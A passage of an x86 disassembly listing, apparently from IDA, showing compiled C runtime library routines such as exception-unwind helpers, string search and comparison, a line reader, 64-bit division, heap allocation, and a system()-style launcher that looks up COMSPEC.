var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_42AC1C
push large dword ptr fs:0
mov large fs:0, esp
loc_42AC5B: ; CODE XREF: sub_42AC3E:loc_42AC96�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_42AC98
cmp esi, [esp+1Ch+arg_4]
jz short loc_42AC98
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_42AC96
push 101h
mov eax, [ebx+esi*4+8]
call sub_42ACD2
call dword ptr [ebx+esi*4+8]
loc_42AC96: ; CODE XREF: sub_42AC3E+44�j
jmp short loc_42AC5B
; ---------------------------------------------------------------------------
loc_42AC98: ; CODE XREF: sub_42AC3E+2A�j
; sub_42AC3E+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_42AC3E endp
; =============== S U B R O U T I N E =======================================
sub_42ACA6 proc near ; CODE XREF: sub_4317E1+3F�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_42AC1C
jnz short locret_42ACC8
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_42ACC8
mov eax, 1
locret_42ACC8: ; CODE XREF: sub_42ACA6+10�j
; sub_42ACA6+1B�j
retn
sub_42ACA6 endp
; =============== S U B R O U T I N E =======================================
sub_42ACC9 proc near ; CODE XREF: sub_431AB0+1E�p
; sub_431AB0+40�p
push ebx
push ecx
mov ebx, offset dword_450E54
jmp short loc_42ACDC
sub_42ACC9 endp
; =============== S U B R O U T I N E =======================================
sub_42ACD2 proc near ; CODE XREF: sub_42AC3E+4F�p
; sub_42ACF4+78�p
push ebx
push ecx
mov ebx, offset dword_450E54
mov ecx, [ebp+8]
loc_42ACDC: ; CODE XREF: sub_42ACC9+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_42ACD2 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ACF4 proc near ; DATA XREF: .text:0040A4EF�o
; sub_40A575+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_42AD94
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_42AD27: ; CODE XREF: sub_42ACF4+90�j
cmp esi, 0FFFFFFFFh
jz short loc_42AD8D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_42AD7B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_42AD7B
js short loc_42AD86
mov edi, [ebx+8]
push ebx
call sub_42ABFC
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_42AC3E
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_42ACD2
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_42AD7B: ; CODE XREF: sub_42ACF4+40�j
; sub_42ACF4+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_42AD27
; ---------------------------------------------------------------------------
loc_42AD86: ; CODE XREF: sub_42ACF4+54�j
mov eax, 0
jmp short loc_42ADA9
; ---------------------------------------------------------------------------
loc_42AD8D: ; CODE XREF: sub_42ACF4+36�j
mov eax, 1
jmp short loc_42ADA9
; ---------------------------------------------------------------------------
loc_42AD94: ; CODE XREF: sub_42ACF4+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_42AC3E
add esp, 8
pop ebp
mov eax, 1
loc_42ADA9: ; CODE XREF: sub_42ACF4+97�j
; sub_42ACF4+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42ACF4 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_42AC3E
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42ADD0 proc near ; CODE XREF: sub_40A5FF+29�p
; sub_40A633+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_42AE4A
mov dh, [ecx+1]
test dh, dh
jz short loc_42AE37
loc_42ADE8: ; CODE XREF: sub_42ADD0+52�j
; sub_42ADD0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_42AE0A
test al, al
jz short loc_42AE04
loc_42ADF9: ; CODE XREF: sub_42ADD0+32�j
mov al, [esi]
inc esi
loc_42ADFC: ; CODE XREF: sub_42ADD0+3F�j
cmp al, dl
jz short loc_42AE0A
test al, al
jnz short loc_42ADF9
loc_42AE04: ; CODE XREF: sub_42ADD0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42AE0A: ; CODE XREF: sub_42ADD0+23�j
; sub_42ADD0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_42ADFC
lea edi, [esi-1]
loc_42AE14: ; CODE XREF: sub_42ADD0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_42AE43
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_42ADE8
mov al, [ecx+3]
test al, al
jz short loc_42AE43
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_42AE14
jmp short loc_42ADE8
; ---------------------------------------------------------------------------
loc_42AE37: ; CODE XREF: sub_42ADD0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_42B0D6
; ---------------------------------------------------------------------------
loc_42AE43: ; CODE XREF: sub_42ADD0+49�j
; sub_42ADD0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_42AE4A: ; CODE XREF: sub_42ADD0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_42ADD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AE50 proc near ; CODE XREF: sub_40A938+869C�p
; sub_40A938+86A6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
xor esi, esi
cmp dword_676988, esi
push edi
mov [ebp+var_8], esi
jnz short loc_42AE8E
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_42AF80
loc_42AE72: ; CODE XREF: sub_42AE50+37�j
mov cl, [edx]
cmp cl, 41h
jl short loc_42AE83
cmp cl, 5Ah
jg short loc_42AE83
add cl, 20h
mov [edx], cl
loc_42AE83: ; CODE XREF: sub_42AE50+27�j
; sub_42AE50+2C�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_42AE72
jmp loc_42AF80
; ---------------------------------------------------------------------------
loc_42AE8E: ; CODE XREF: sub_42AE50+12�j
mov edi, offset dword_676EBC
push edi
call dword_437220 ; InterlockedIncrement
cmp dword_676EB8, esi
jz short loc_42AEBA
push edi
call dword_43721C ; InterlockedDecrement
push 13h
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
jmp short loc_42AEBD
; ---------------------------------------------------------------------------
loc_42AEBA: ; CODE XREF: sub_42AE50+50�j
mov [ebp+var_4], esi
loc_42AEBD: ; CODE XREF: sub_42AE50+68�j
mov eax, dword_676988
cmp eax, esi
jnz short loc_42AF03
cmp [ebp+var_4], esi
jz short loc_42AED5
push 13h
call sub_42DA80
pop ecx
jmp short loc_42AEDC
; ---------------------------------------------------------------------------
loc_42AED5: ; CODE XREF: sub_42AE50+79�j
push edi
call dword_43721C ; InterlockedDecrement
loc_42AEDC: ; CODE XREF: sub_42AE50+83�j
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_42AF80
loc_42AEEA: ; CODE XREF: sub_42AE50+AF�j
mov cl, [edx]
cmp cl, 41h
jl short loc_42AEFB
cmp cl, 5Ah
jg short loc_42AEFB
add cl, 20h
mov [edx], cl
loc_42AEFB: ; CODE XREF: sub_42AE50+9F�j
; sub_42AE50+A4�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_42AEEA
jmp short loc_42AF80
; ---------------------------------------------------------------------------
loc_42AF03: ; CODE XREF: sub_42AE50+74�j
push ebx
push 1
push esi
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_0]
mov esi, 100h
push esi
push eax
call sub_430CCF
mov ebx, eax
add esp, 20h
test ebx, ebx
jz short loc_42AF5C
push ebx
call sub_4296E8
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_42AF5C
push 1
push 0
push ebx
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push dword_676988
call sub_430CCF
add esp, 20h
test eax, eax
jz short loc_42AF5C
push [ebp+var_8]
push [ebp+arg_0]
call sub_42A500
pop ecx
pop ecx
loc_42AF5C: ; CODE XREF: sub_42AE50+D1�j
; sub_42AE50+DF�j ...
cmp [ebp+var_4], 0
pop ebx
jz short loc_42AF6D
push 13h
call sub_42DA80
pop ecx
jmp short loc_42AF74
; ---------------------------------------------------------------------------
loc_42AF6D: ; CODE XREF: sub_42AE50+111�j
push edi
call dword_43721C ; InterlockedDecrement
loc_42AF74: ; CODE XREF: sub_42AE50+11B�j
push [ebp+var_8]
call sub_429822
mov eax, [ebp+arg_0]
pop ecx
loc_42AF80: ; CODE XREF: sub_42AE50+1C�j
; sub_42AE50+39�j ...
pop edi
pop esi
leave
retn
sub_42AE50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AF90 proc near ; CODE XREF: sub_40A938+620B�p
; sub_40A938+6230�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_42AFB1
xor eax, eax
jmp short loc_42AFB3
; ---------------------------------------------------------------------------
loc_42AFB1: ; CODE XREF: sub_42AF90+1B�j
mov eax, edi
loc_42AFB3: ; CODE XREF: sub_42AF90+1F�j
cld
pop edi
leave
retn
sub_42AF90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AFB7 proc near ; CODE XREF: sub_40A938+4B19�p
; sub_424DE2+12B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_42AFCB
xor eax, eax
jmp short loc_42B015
; ---------------------------------------------------------------------------
loc_42AFCB: ; CODE XREF: sub_42AFB7+E�j
push esi
mov esi, [ebp+arg_8]
push esi
call sub_42C104
pop ecx
loc_42AFD6: ; CODE XREF: sub_42AFB7+46�j
dec [ebp+arg_4]
jz short loc_42B008
dec dword ptr [esi+4]
js short loc_42AFEA
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_42AFF1
; ---------------------------------------------------------------------------
loc_42AFEA: ; CODE XREF: sub_42AFB7+27�j
push esi
call sub_42F312
pop ecx
loc_42AFF1: ; CODE XREF: sub_42AFB7+31�j
cmp eax, 0FFFFFFFFh
jz short loc_42AFFF
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_42B008
jmp short loc_42AFD6
; ---------------------------------------------------------------------------
loc_42AFFF: ; CODE XREF: sub_42AFB7+3D�j
cmp edi, [ebp+arg_0]
jnz short loc_42B008
xor ebx, ebx
jmp short loc_42B00B
; ---------------------------------------------------------------------------
loc_42B008: ; CODE XREF: sub_42AFB7+22�j
; sub_42AFB7+44�j ...
and byte ptr [edi], 0
loc_42B00B: ; CODE XREF: sub_42AFB7+4F�j
push esi
call sub_42C156
pop ecx
mov eax, ebx
pop esi
loc_42B015: ; CODE XREF: sub_42AFB7+12�j
pop edi
pop ebx
pop ebp
retn
sub_42AFB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B019 proc near ; CODE XREF: sub_40A938+46CD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push offset aComspec ; "COMSPEC"
call sub_4311F2
pop ecx
xor esi, esi
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
cmp ecx, esi
jnz short loc_42B050
cmp eax, esi
jnz short loc_42B040
xor eax, eax
jmp short loc_42B0B7
; ---------------------------------------------------------------------------
loc_42B040: ; CODE XREF: sub_42B019+21�j
push esi
push eax
call sub_42A5F0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_42B0B7
; ---------------------------------------------------------------------------
loc_42B050: ; CODE XREF: sub_42B019+1D�j
cmp eax, esi
mov [ebp+var_C], offset dword_437450
mov [ebp+var_8], ecx
mov [ebp+var_4], esi
jz short loc_42B08F
lea ecx, [ebp+var_10]
push esi
push ecx
push eax
push esi
call sub_431058
mov edi, eax
add esp, 10h
cmp edi, 0FFFFFFFFh
jnz short loc_42B08B
call sub_42F049
cmp dword ptr [eax], 2
jz short loc_42B08F
call sub_42F049
cmp dword ptr [eax], 0Dh
jz short loc_42B08F
loc_42B08B: ; CODE XREF: sub_42B019+5C�j
mov eax, edi
jmp short loc_42B0B7
; ---------------------------------------------------------------------------
loc_42B08F: ; CODE XREF: sub_42B019+46�j
; sub_42B019+66�j ...
test byte_6769B1, 80h
mov [ebp+var_10], offset dword_437444
jnz short loc_42B0A6
mov [ebp+var_10], offset aCmd_exe ; "cmd.exe"
loc_42B0A6: ; CODE XREF: sub_42B019+84�j
lea eax, [ebp+var_10]
push esi
push eax
push [ebp+var_10]
push esi
call sub_430EF3
add esp, 10h
loc_42B0B7: ; CODE XREF: sub_42B019+25�j
; sub_42B019+35�j ...
pop edi
pop esi
leave
retn
sub_42B019 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_42B0D0
loc_42B0C0: ; CODE XREF: sub_42B0D0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42B0D0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B0D0 proc near ; CODE XREF: sub_40A938+4682�p
; sub_40A938+603F�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0042B0C0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_42B0D6: ; CODE XREF: sub_42ADD0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_42B0FB
loc_42B0E8: ; CODE XREF: sub_42B0D0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_42B0C0
test cl, cl
jz short loc_42B144
test edx, 3
jnz short loc_42B0E8
loc_42B0FB: ; CODE XREF: sub_42B0D0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_42B106: ; CODE XREF: sub_42B0D0+61�j
; sub_42B0D0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_42B148
and eax, 81010100h
jz short loc_42B106
and eax, 1010100h
jnz short loc_42B142
and esi, 80000000h
jnz short loc_42B106
loc_42B142: ; CODE XREF: sub_42B0D0+68�j
; sub_42B0D0+81�j ...
pop esi
pop edi
loc_42B144: ; CODE XREF: sub_42B0D0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42B148: ; CODE XREF: sub_42B0D0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_42B185
test al, al
jz short loc_42B142
cmp ah, bl
jz short loc_42B17E
test ah, ah
jz short loc_42B142
shr eax, 10h
cmp al, bl
jz short loc_42B177
test al, al
jz short loc_42B142
cmp ah, bl
jz short loc_42B170
test ah, ah
jz short loc_42B142
jmp short loc_42B106
; ---------------------------------------------------------------------------
loc_42B170: ; CODE XREF: sub_42B0D0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B177: ; CODE XREF: sub_42B0D0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B17E: ; CODE XREF: sub_42B0D0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B185: ; CODE XREF: sub_42B0D0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_42B0D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B190 proc near ; CODE XREF: sub_40A938+A4C�p
; sub_431588+26�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_42B1DC
loc_42B1A0: ; CODE XREF: sub_42B190+3C�j
; sub_42B190+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_42B1D4
or al, al
jz short loc_42B1D0
cmp ah, [ecx+1]
jnz short loc_42B1D4
or ah, ah
jz short loc_42B1D0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_42B1D4
or al, al
jz short loc_42B1D0
cmp ah, [ecx+3]
jnz short loc_42B1D4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_42B1A0
mov edi, edi
loc_42B1D0: ; CODE XREF: sub_42B190+18�j
; sub_42B190+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_42B1D4: ; CODE XREF: sub_42B190+14�j
; sub_42B190+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_42B1DC: ; CODE XREF: sub_42B190+E�j
test edx, 1
jz short loc_42B1F8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_42B1D4
inc ecx
or al, al
jz short loc_42B1D0
test edx, 2
jz short loc_42B1A0
loc_42B1F8: ; CODE XREF: sub_42B190+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_42B1D4
or al, al
jz short loc_42B1D0
cmp ah, [ecx+1]
jnz short loc_42B1D4
or ah, ah
jz short loc_42B1D0
add ecx, 2
jmp short loc_42B1A0
sub_42B190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B220 proc near ; CODE XREF: sub_40A938+190F�p
; sub_418EDB+10D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_42B241
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_42B241: ; CODE XREF: sub_42B220+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_42B25D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_42B25D: ; CODE XREF: sub_42B220+27�j
or eax, eax
jnz short loc_42B279
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_42B2BA
; ---------------------------------------------------------------------------
loc_42B279: ; CODE XREF: sub_42B220+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_42B287: ; CODE XREF: sub_42B220+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_42B287
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_42B2B5
cmp edx, [esp+0Ch+arg_4]
ja short loc_42B2B5
jb short loc_42B2B6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_42B2B6
loc_42B2B5: ; CODE XREF: sub_42B220+85�j
; sub_42B220+8B�j
dec esi
loc_42B2B6: ; CODE XREF: sub_42B220+8D�j
; sub_42B220+93�j
xor edx, edx
mov eax, esi
loc_42B2BA: ; CODE XREF: sub_42B220+57�j
dec edi
jnz short loc_42B2C4
neg edx
neg eax
sbb edx, 0
loc_42B2C4: ; CODE XREF: sub_42B220+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_42B220 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B2CA proc near ; CODE XREF: sub_415440+5�p
; sub_418A0D+19C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042B36C SIZE 0000007B BYTES
; FUNCTION CHUNK AT 0042B3F5 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437460
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+arg_4], esi
mov [ebp+var_1C], esi
cmp esi, 0FFFFFFE0h
ja short loc_42B313
xor ebx, ebx
cmp esi, ebx
jnz short loc_42B308
push 1
pop esi
loc_42B308: ; CODE XREF: sub_42B2CA+39�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
jmp short loc_42B315
; ---------------------------------------------------------------------------
loc_42B313: ; CODE XREF: sub_42B2CA+33�j
xor ebx, ebx
loc_42B315: ; CODE XREF: sub_42B2CA+47�j
; sub_42B2CA+115�j
mov [ebp+var_20], ebx
cmp esi, 0FFFFFFE0h
ja loc_42B3C9
mov eax, dword_676FE4
cmp eax, 3
jnz short loc_42B36C
mov edi, [ebp+var_1C]
cmp edi, dword_676FDC
ja short loc_42B3B2
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], ebx
push edi
call sub_42CB7E
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42B363
cmp [ebp+var_20], ebx
jz short loc_42B3B7
push [ebp+var_1C]
jmp short loc_42B3A6
sub_42B2CA endp
; =============== S U B R O U T I N E =======================================
sub_42B35E proc near ; DATA XREF: .text:00437468�o
xor ebx, ebx
mov esi, [ebp+0Ch]
sub_42B35E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B363 proc near ; CODE XREF: sub_42B2CA+85�p
push 9
call sub_42DA80
pop ecx
retn
sub_42B363 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B2CA
loc_42B36C: ; CODE XREF: sub_42B2CA+5F�j
cmp eax, 2
jnz short loc_42B3B2
cmp esi, dword_453154
ja short loc_42B3B2
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_42D621
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42B3EC
cmp [ebp+var_20], ebx
jz short loc_42B3B7
push esi
loc_42B3A6: ; CODE XREF: sub_42B2CA+92�j
push ebx
push [ebp+var_20]
call sub_429690
add esp, 0Ch
loc_42B3B2: ; CODE XREF: sub_42B2CA+6A�j
; sub_42B2CA+A5�j ...
cmp [ebp+var_20], ebx
jnz short loc_42B3F5
loc_42B3B7: ; CODE XREF: sub_42B2CA+8D�j
; sub_42B2CA+D9�j
push esi
push 8
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
mov [ebp+var_20], eax
loc_42B3C9: ; CODE XREF: sub_42B2CA+51�j
cmp [ebp+var_20], ebx
jnz short loc_42B3F5
cmp dword_676910, ebx
jz short loc_42B3F5
push esi
call sub_42C5F5
pop ecx
test eax, eax
jnz loc_42B315
jmp short loc_42B3F8
; END OF FUNCTION CHUNK FOR sub_42B2CA
; =============== S U B R O U T I N E =======================================
sub_42B3E7 proc near ; DATA XREF: .text:00437474�o
xor ebx, ebx
mov esi, [ebp+0Ch]
sub_42B3E7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B3EC proc near ; CODE XREF: sub_42B2CA+D1�p
push 9
call sub_42DA80
pop ecx
retn
sub_42B3EC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B2CA
loc_42B3F5: ; CODE XREF: sub_42B2CA+EB�j
; sub_42B2CA+102�j ...
mov eax, [ebp+var_20]
loc_42B3F8: ; CODE XREF: sub_42B2CA+11B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_42B2CA
; =============== S U B R O U T I N E =======================================
sub_42B407 proc near ; CODE XREF: sub_4154E4+F�p
; sub_4154E4+30�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_4296FA
pop ecx
pop ecx
retn
sub_42B407 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B415 proc near ; CODE XREF: sub_431699+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_42B415 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_42B449 proc near ; CODE XREF: sub_431859+199�p
; sub_431A1D+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_42B449 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B450 proc near ; CODE XREF: sub_431859+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_42B450 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B457 proc near ; CODE XREF: sub_42B60B+5C�p
; sub_431699:loc_4316CA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_42B47F
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_436230 ; RtlUnwind
loc_42B47F: ; DATA XREF: sub_42B457+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_42B457 endp
; ---------------------------------------------------------------------------
loc_42B4A6: ; CODE XREF: .text:00436247�j
; .text:00436259�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_431290
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B4DC proc near ; CODE XREF: sub_431714+7B�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
